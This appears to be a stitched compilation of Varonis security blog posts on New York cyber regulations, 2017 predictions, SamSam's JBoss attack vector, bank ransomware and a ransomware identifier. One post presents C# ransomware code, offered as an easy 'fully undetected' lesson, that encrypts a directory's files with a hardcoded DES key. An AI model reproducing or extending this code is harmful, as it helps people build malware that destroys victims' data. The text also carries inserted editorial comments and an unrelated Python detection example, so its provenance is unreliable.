And here’s proof:  https://www.varonis.com/ransomware-solutions




Update: New York State Finalizes Cyber Rules for Financial Sector


When last we left New York State’s innovative cybercrime regulations, they were in a 45-day public commenting period. Let’s get caught up. The comments are now in. The rules were tweaked based on stakeholders’ feedback, and the regulations will begin a grace period starting March 1, 2017.

To save you the time, I did the heavy lifting and looked into the changes made by the regulators at the New York State Department of Financial Services (NYSDFS).

There are a few interesting ones to talk about. But before we get into them, let’s consider how important New York State — really New York City — is as a financial center.

Made in New York: Money!

To get a sense of what’s encompassed in the NYDFS’s portfolio, I took a quick dip into their annual report.

For the insurance sector, they supervise almost 900 insurers with assets of $1.4 trillion and receive premiums of $361 billion. Under wholesale domestic and foreign banks — remember New York has a global reach — they monitor 144 institutions with assets of $2.2 trillion. And I won’t even get into community and regional banks, mortgage brokers, and pension funds.

In a way, the NYSDFS has the regulatory power usually associated with a small country’s government, and therefore the rules New York makes regarding data security have an outsized influence.

One Rule Remains the Same

Back to the rules. First, let’s look at one key part that was not changed.

NYSDFS received objections from the commenters on its definition of cyber events. This definition is at the center of the New York law—detecting, responding to, and recovering from these events—so it’s important to take a closer look at its meaning.

Under the rules, a cybersecurity event is “any act or attempt, successful or unsuccessful, to gain unauthorized access to, disrupt or misuse an Information System or information …”

Some of the commenters didn’t like the inclusion of “attempt” and “unsuccessful”. But the New York regulators held firm and kept the definition as is.

A cybersecurity event is a broader term than a data breach. For a data breach, there usually has to be data access and exposure or exfiltration. In New York State, though, access alone or an IT disruption, even when only attempted (or executed but unsuccessful), is considered an event.

As we’ve pointed out in our ransomware and the law cheat sheet, very few states in the US would classify a ransomware attack as a breach under their breach laws.

But in New York State, if ransomware (or a remote access trojan or other malware) was loaded on the victim’s server and perhaps abandoned or stopped by IT in mid-hack, it would indeed be a cybersecurity event.

Notification Worthy

This leads naturally to another rule, notification of a cybersecurity event to the New York State regulators, where the language was tightened.

The 72-hour time frame for reporting remains, but the clock starts ticking after a determination by the financial company that an event has occurred.

The financial companies were also given more wiggle room in the types of events that require notification: essentially the malware would need to “have a reasonable likelihood of materially harming any material part of the normal operation…”

That’s a mouthful.

In short: financial companies will notify the regulators at NYSDFS when the malware could seriously affect an operation that’s important to the company.

For example, malware that infects the digital console on the bank’s espresso machine is not notification worthy. But a key logger that lands in a bank’s foreign exchange area and is scooping up user passwords is very worthy.

The NYDFS’s updated notification rule language, by the way, puts it more in line with other data security laws, including the EU’s General Data Protection Regulation (GDPR).

So would you have to notify the New York State regulator when malware infects a server but hasn’t necessarily completed its evil mission?

Getting back to the language of “attempt” and “unsuccessful” found in the definition of cybersecurity events, it would appear that you would but only if the malware lands on a server that’s important to the company’s operations — either because of the data it contains or its function.

State of Grace

The original regulation also said you had to appoint a Chief Information Security Officer (CISO) who’d be responsible for seeing this cybersecurity regulation is carried out. Another important task of the CISO is to annually report to the board on the state of the company’s cybersecurity program.

With pushback from industry, this language was changed so that you can designate an existing employee as a CISO — likely a CIO or other C-level.

One final point to make is that the grace period for compliance has been changed. For most of the rules, it’s still 180 days.

But for certain requirements – multifactor authentication and penetration testing — the grace period has been extended to 12 months, and for a few others – audit trails, data retention, and the CISO report to the board — it’s been pushed out to 18 months.

For more details on the changes, check this legal note from our attorney friends at Hogan Lovells.

Can Our Crystal Ball Hack It? 2017 Varonis Cybersecurity Predictions


Everyone makes predictions at this time of year, but who looks back to check on their accuracy? Let’s have a look at some of last year’s omens before directing our forecast lens to 2017.

Our first prediction for 2016: The U.S. Presidential campaign will be affected by a cyber attack.

We were on to something here, but we should have said numerous attacks. From Wikileaks exposing internal campaign emails to allegations that Russia attempted to affect the outcome, security became a front-and-center issue.

We also predicted: Ransomware damage will double.

We had the right direction but the problem actually became far worse than our modest foreboding (a real kick in the crystal ball). While 2015 saw about $325 million in ransom from CryptoLocker alone, 2016 will likely hit $1 billion in ransomware damages according to the FBI.

Amid the hacked ruins, compromised confidences and costly shakedowns of 2016 is the realization that privacy can never truly be assured for modern communications.

Let’s see what 2017 will bring.

1. Extortionware will be the new lucrative thing.

Ransomware’s more targeted, more difficult and more lucrative cousin, will emerge and cause major financial damages because of the sheer size of the payouts demanded when highly sensitive data is threatened with exposure. This will go largely unreported for reasons of discretion, making the prescience of this prediction conveniently unverifiable next year.

2. Ransomware will continue to be a major thing (and backups aren’t enough).

Ransomware will continue to grow in terms of the sheer number and frequency of attacks on organizations. IT best practices for defending against ransomware will expand from backup remediation to early detection and alerting as user behavior analytics become more intelligent and predictive. Stopping an attempted attack – before or right after it starts – is far more efficient and less painful than figuring out which files were affected and restoring them from backup.

3. Threats within will drive the need for smarter security analytics.

Adoption of security analytics will increase, as insider threats continue to get CXO and board-level attention. Insiders have legitimate access to systems and data, so preventing initial access is more than impractical. Detection is the next line of defense for employees or contractors who abuse their access, and to reveal insider credentials that are stolen.

4. Goodbye, ads. Hello, blockers.

The use of ad blockers will skyrocket after another major media site becomes a distributor of malware (as Forbes was in 2016) and users take more deliberate command of their own protection against growing malware threats.

5. Weaponizing IoT will become a regular occurrence.

IoT (Internet of Things) devices such as DVRs and security cameras will become more frequent targets for attackers. While the devices themselves may not all contain valuable data, they represent potential stepping stones on a hacker’s path to steal digital assets. The Mirai botnet, capable of some of the biggest attacks yet and able to reach high volumes with minimal ramp-up time, will threaten the adoption of IoT applications as device makers realize they must make security a design principle or lose their markets.

6. You’re hired, Ms. IT Security Candidate.

With $1 trillion predicted to be spent globally on cybersecurity between 2017 and 2021 and more than 200,000 security jobs currently unfilled in the U.S., computer security skills will continue to be the hottest kind in the IT job market in terms of the number of unfilled jobs and the compensation levels.

7. Organizations will need to save users from themselves.

User education on password hygiene and recognizing potential attacks will continue to increase but the reality will sink in that vigilance alone will not suffice, as phishing and malware become more and more difficult for even careful employees to detect. Organizational remedies will become more widespread to protect their employees, customers, partners, and themselves.

Malware Coding Lessons for IT People, Part II: Fun With FUD Ransomware!


This article is part of the series "Malware Coding Lessons for IT People". Check out the rest:

Let’s not overthink ransomware! It’s just a small malicious piece of code with one devious goal — encrypting all of the user’s important files. If the unfortunate victim wants to recover them, he or she will have to pay a hefty amount to retrieve the decryption key.

How hard is ransomware?

In this post, I’ll show you how incredibly easy it is to code a FUD (Fully Undetected) ransomware using public Microsoft libraries with C#.

Ransomware 101

As I discussed in my previous post, there are a few ways to get infected with malware – for starters, malicious attachments, rogue websites, and phishing campaigns, as well as some other creative methods I’ll cover in a future post.

Ok, say we’ve clicked on a malicious ransomware file. What’s going to happen next? Persistency!

Persistency is the code the hacker uses to let the malware survive restarts and to disguise it so that it is hard to detect (and remove). While persistency is (usually) generic across many different malware families, there are some techniques unique to ransomware. I’ll get into this in a future post.

At its core, ransomware is just software that performs bulk encryption of the data contents in the victim’s file system. Typically, asymmetric encryption — with different keys for encryption and decryption — is preferred by hackers since it is much harder to recover the data.

An asymmetric algorithm encrypts the file contents with a public key, while decryption requires a different private key that only the attacker has. You can learn more about asymmetric encryption here: https://en.wikipedia.org/wiki/Public-key_cryptography.

The malware can also choose a weaker approach, such as a symmetric encryption algorithm, in which the same key is used for both encryption and decryption.

To make the code even simpler, we will use an API that does the symmetric encryption algorithm.

And Now the Code

The next part of the software that newbies need to know about is traversing the file system. Essentially, you’re travelling through the directory hierarchy, collecting file pathnames, and then feeding the file contents to the encryption engine. Then, of course, the encrypted file has to be written back.

The files to be encrypted are usually the ones companies depend on. We’re talking documents, spreadsheets, images, presentations, audio, and emails. By the way, hackers usually will not encrypt movies because of their size and the impact on the malware’s performance. That’s a small consolation—employees can be watching movies while IT is restoring from a backup.

Once the files list is generated after navigating the directories, it’s a good idea to wait for an appropriate time to start the encryption. The idea is to then encrypt as much file contents as possible from the list before being detected.

More sophisticated ransomware will attempt to learn the idle time of the infected computer — when there’s CPU available — and slip in the encryption processing at appropriate times to avoid detection.

Enough talk, here’s the code.

First snippet: Choose a random key to encrypt the data with:

string key = "R?\n??i??";

Basically you can choose any key that you like, remember that we are going to choose symmetric algorithm so the key will be used for encrypting and decrypting as well.

Second snippet: Encrypt an entire directory’s contents:

    private static void EncryptDir(string d, int mili)
    {
        DirectoryInfo dirtoencrypt = new DirectoryInfo(d);
        FileInfo[] file = dirtoencrypt.GetFiles();
        foreach (FileInfo currentFile in file)
        {
            // Executables are skipped; every other file gets an encrypted ".axx" copy.
            // (The mili parameter is not used in this snippet.)
            if (currentFile.Extension.ToLower() != ".exe")
            {
                string key = "R?\n??i??";
                EncryptFile(currentFile.FullName, currentFile.FullName + ".axx", key);
            }
        }
    }

Third Snippet: The encrypting function, taken directly from MSDN (https://support.microsoft.com/en-us/kb/307010)

    using System.IO;
    using System.Security.Cryptography;
    using System.Text;

    static void EncryptFile(string sInputFilename, string sOutputFilename, string sKey)
    {
        // The stream modes and CryptoStream arguments were cut off in the original
        // listing and are restored here from the MSDN sample linked above.
        FileStream fsInput = new FileStream(sInputFilename, FileMode.Open, FileAccess.Read);
        FileStream fsEncrypted = new FileStream(sOutputFilename, FileMode.Create, FileAccess.Write);
        DESCryptoServiceProvider DES = new DESCryptoServiceProvider();
        // The same 8-byte ASCII string serves as both the DES key and the IV.
        DES.Key = ASCIIEncoding.ASCII.GetBytes(sKey);
        DES.IV = ASCIIEncoding.ASCII.GetBytes(sKey);
        ICryptoTransform desencrypt = DES.CreateEncryptor();
        CryptoStream cryptostream = new CryptoStream(fsEncrypted, desencrypt, CryptoStreamMode.Write);
        // Read the whole input file, push it through the encryptor and close the
        // streams; closing the CryptoStream flushes the final padded block.
        byte[] bytearrayinput = new byte[fsInput.Length];
        fsInput.Read(bytearrayinput, 0, bytearrayinput.Length);
        cryptostream.Write(bytearrayinput, 0, bytearrayinput.Length);
        cryptostream.Close();
        fsInput.Close();
        fsEncrypted.Close();
    }


That’s it!

A malicious tool with tons of damage potential in fewer than 100 lines of code and under 10 KB after compiling.

I’ll put together more pieces of the ransomware puzzle in another post.

New SamSam Ransomware Exploiting Old JBoss Vulnerability


One of the lessons learned from the uptick in ransomware attacks is that it pays to keep your security patches up to date. A few months ago the SamSam/Samas malware was (and is still) having great success primarily against healthcare companies and hospitals.

The attack vector, though, was not based on phishing or social engineering. SamSam instead exploits a very old (and surprising) vulnerability in JBoss, Red Hat’s Java-based web server environment.

No Phishing

JMX is the administrative console web app for JBoss — yes, everything starts with a J. Unfortunately, by default the JMX home page is reachable externally without any authentication check.

Like any good admin tool, JMX gives you access to some basic functions, including running Java code.

Are you thinking what I’m thinking?

Hackers discovering this JBoss vulnerability quickly realized that if they could upload a simple shell they were on their way to controlling the server.

And that’s the way this exploit works. If you want to read the technical details and the coding involved, you can google on “jboss vulnerability”.

This is a very well-known security hole – the CVE dates back to 2010—and it has since been patched.

But it has come back into the limelight because the SamSam ransomware has very successfully used it against healthcare orgs, which for whatever reason are more likely to have JBoss installations.

Once the cyber thieves gain entry through JMX, they upload the ransomware. And start collecting the fees. No phishing required.

How bad is the problem?

According to Cisco security researchers, there could be as many as 3.2 million installations at risk.

Remote Access Trojan by Any other Name

Attackers can find sites that have JBoss by Google dorking, which allows you to search for part of the telltale URL – in this case “jmx-console”—that indicates a JBoss server on an exposed site.


It’s an admin console! It’s a remote access trojan! It’s both!

In looking at the JBoss attack techniques, I saw lots of code where the JMX interface acts as a starting point for uploading and launching other software, say a reverse shell. So the vulnerability leaves the door open to other attacks, not just ransomware.

To put it bluntly, the JMX interface is an unintentional Remote Access Trojan or RAT, which we wrote about in our pen testing series.

Normally the attacker has to first install the RAT, but with these unpatched Red Hat installations it’s there — gasp!— waiting for them.

Maybe it’s a good time now to bring all your systems up to date with the latest security patches — I’m talking to you healthcare orgs!


One Take Away from Black Hat 2016: Designer Ransomware!


We had an amazing week at Black Hat 2016.  One topic that was on attendees’ minds— besides hacking Jeeps and chip-and-pin technology — was ransomware. A security analysis firm now warns us that ransomware has become more clickable because the thieves are localizing the phish mail.

You should watch the video below for the full interview with an analyst from Sophos.

The key takeaway is that the ransomware designers have learned some marketing tricks from non-criminal enterprises.

These digital bandits know to focus their efforts on richer countries that can afford to pay the ransom, and then customize the email contents using very local companies and brands.

So you may receive a nicely crafted email with the name and logo of, say, a utility company or government agency. The hackers have gotten better at working out the location of the victims based on their IP addresses.

With the attackers’ improved powers of “market segmentation”, we’re a long way from one-size-fits-all Nigerian 419 schemes!

You and I could easily spot that the sender of the email containing the malware is phony – see our phish mail post — but the average employee might not.

Of course, your company should be boosting employee security budgets to make it less likely that workers will click on an UPS invoice.

More than that, though, companies should lower their overall risk exposure surface. It just makes sense, as Rob has just pointed out, to limit the files that the attacker can access in the first place.

We’ll be talking more about ransomware next week when we present the results of a custom survey that we’re finishing up.



Banks Secretly and Silently Struggling with Ransomware


“You’re almost certainly not going to hear about successful ransomware attacks on banks,” says Fraud Prevention Expert, Ross Hogan in an interview with Banking Exchange. “It is probably one of the most catastrophic events that a bank could suffer.”


If a financial institution made a public announcement that the firm was infected with ransomware, the brand damage would be irreparable.

Moreover, it could create panic among customers and trigger a bank run: customers withdraw their cash, the bank runs out of it and unexpectedly faces bankruptcy. From an economic standpoint, the result would be catastrophic.

And NO ONE wants this to happen.

But we know financial institutions are a target

How? Ransomware does not discriminate.

All it takes is one phishing click or a wrong installation and your computer or your entire network could take a hit. (Listen to our podcast: Journey of a Ransomware Attack)

“They’re not just trying to infect your workstation and lock your files on your workstation; they’re trying to go for any network drive they can find,” says Editor-in-Chief of Cyberheist Stu Sjouwerman. “That’s where the risk is. This is what happened at Presbyterian Hospital in Hollywood.”

Not only has ransomware infected hospitals, but schools, police departments, and city departments – all institutions that we rely on.

The financial industry took note. Last year, the Federal Financial Institutions Examination Council issued a ransomware warning about the frequency and severity of the threat.

What banks can do

Be proactive and learn how you can protect your organization from the inside out:

How Varonis helps financial services stop and prevent ransomware

We’ve been working with organizations across all verticals to prevent ransomware. Here are a few quotes from financial institutions describing how Varonis helps them stop and prevent it:

  • “Even though we have a state of the art firewall and new antivirus software, neither was able to detect or stop Crypto. Varonis DatAlert not only sent us email alerts when a user got hit by Crypto, but also logged that user out before the virus could do any damage to network shares. That alone justified its cost.” – Southern California Wealth Management Firm
  • “Our endpoint protection had detected the virus on a computer and had appropriately removed the code, but not before it had kicked off the encryption process. The point to note here is that although the endpoint had isolated the problem it wasn’t able to kill the process. Varonis was able to identify the process and then remediate the issue and we can prevent it from happening again.” – A Northwestern Bank
  • “Of all the expensive security products we’ve purchased, DatAlert is the only solution that has done, and is doing, all of the alerting and notification of anomalous behavior, especially ransomware.” – A Major Bank in Western Canada



How to Identify Ransomware: Use Our New Identification Tool


Sadly, ransomware infections are routine enough that IT departments have started to develop standardized procedures for rapidly quarantining infected machines, determining the extent of the damage and then attempting recovery operations.

For help with locking off computers performing suspicious actions (like modifying thousands of files in a minute), our DatAlert customers are using custom rules and scripts tied to behaviors. They’re running reports in DatAdvantage to rapidly find exactly which files were touched on which servers. However, until recently Varonis has been unable to help with recovery efforts.
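As an added example (not Varonis code), here is a toy detector combining the two approaches this page mentions: a signature rule driven by a dictionary of encrypted-file extensions and ransom-note names, like the DatAlert “Crypto files” dictionaries above, and a behaviour rule that flags one account modifying many files within a minute. The “.axx” suffix comes from the C# snippet on this page; the other extensions, the note name, the thresholds and the audit events are constructed.

```python
# Added example: toy ransomware-activity detector over constructed file-server audit events.
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Signature-style dictionaries. ".axx" is the suffix used by the C# snippet on
# this page; ".locked" and the ransom-note name are constructed placeholders.
CRYPTO_EXTENSIONS = {".axx", ".locked"}
RANSOM_NOTE_NAMES = {"HOW_TO_RESTORE_FILES.txt"}

# Behaviour-style rule: one account changing this many files inside the window
# is treated as "user actions resemble ransomware". Thresholds are constructed.
BURST_WINDOW = timedelta(seconds=60)
BURST_THRESHOLD = 50


def split_name(path):
    """Return (file name, lowercased final extension) for a Windows or POSIX path."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return name, ext


def detect(events, window=BURST_WINDOW, threshold=BURST_THRESHOLD):
    """Return alerts as (rule, user, detail) tuples, in event time order.

    Each event is a dict with keys ts (datetime), user, op and path.
    Read-only operations never count toward the burst rule.
    """
    alerts = []
    recent = defaultdict(deque)   # user -> timestamps of recent file changes
    burst_flagged = set()         # alert once per user, not once per file
    for ev in sorted(events, key=lambda e: e["ts"]):
        user = ev["user"]
        name, ext = split_name(ev["path"])
        if ext in CRYPTO_EXTENSIONS or name in RANSOM_NOTE_NAMES:
            alerts.append(("signature", user, ev["path"]))
        if ev["op"] not in ("modify", "rename", "create"):
            continue
        q = recent[user]
        q.append(ev["ts"])
        while ev["ts"] - q[0] > window:      # drop changes older than the window
            q.popleft()
        if len(q) >= threshold and user not in burst_flagged:
            burst_flagged.add(user)
            secs = int(window.total_seconds())
            alerts.append(("burst", user, f"{len(q)} file changes in {secs}s"))
    return alerts


def build_sample_events():
    """Constructed audit trail: one normal user and one account running an encryptor."""
    t0 = datetime(2017, 5, 12, 9, 0, 0)
    events = []
    # alice edits five spreadsheets over ten minutes: ordinary work.
    for i in range(5):
        events.append({"ts": t0 + timedelta(minutes=2 * i), "user": "alice",
                       "op": "modify", "path": f"\\\\fs01\\finance\\budget{i}.xlsx"})
    # mallory's session renames 60 documents to *.axx in 30 seconds, then drops a note.
    for i in range(60):
        events.append({"ts": t0 + timedelta(seconds=0.5 * i), "user": "mallory",
                       "op": "rename", "path": f"\\\\fs01\\finance\\report{i}.docx.axx"})
    events.append({"ts": t0 + timedelta(seconds=31), "user": "mallory",
                   "op": "create", "path": "\\\\fs01\\finance\\HOW_TO_RESTORE_FILES.txt"})
    return events


if __name__ == "__main__":
    for rule, user, detail in detect(build_sample_events()):
        print(f"[{rule:9}] {user}: {detail}")
```

The behaviour rule fires once for the account at its 50th change, while the signature rule fires per file, which is why a real alerting pipeline usually rate-limits the latter.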

While restoring files from backup is the best recovery option, you are often still left with files created since the last backup was taken, or, where the infection wasn’t promptly caught, with backups that already contain the files the ransomware encrypted.

If you’re in this situation, you need to:

    1. Identify the strain of ransomware you’ve been hit with.
    2. Locate an unlocking application (if any) for that strain.

To help with both of these recovery tasks, we’ve created a Ransomware Identifier. Enter either the file extension of the ransomware encrypted files, or the name of the ransom note file into the Ransomware Identifier search engine and rapidly get your answers.

Try the Ransomware Identifier Now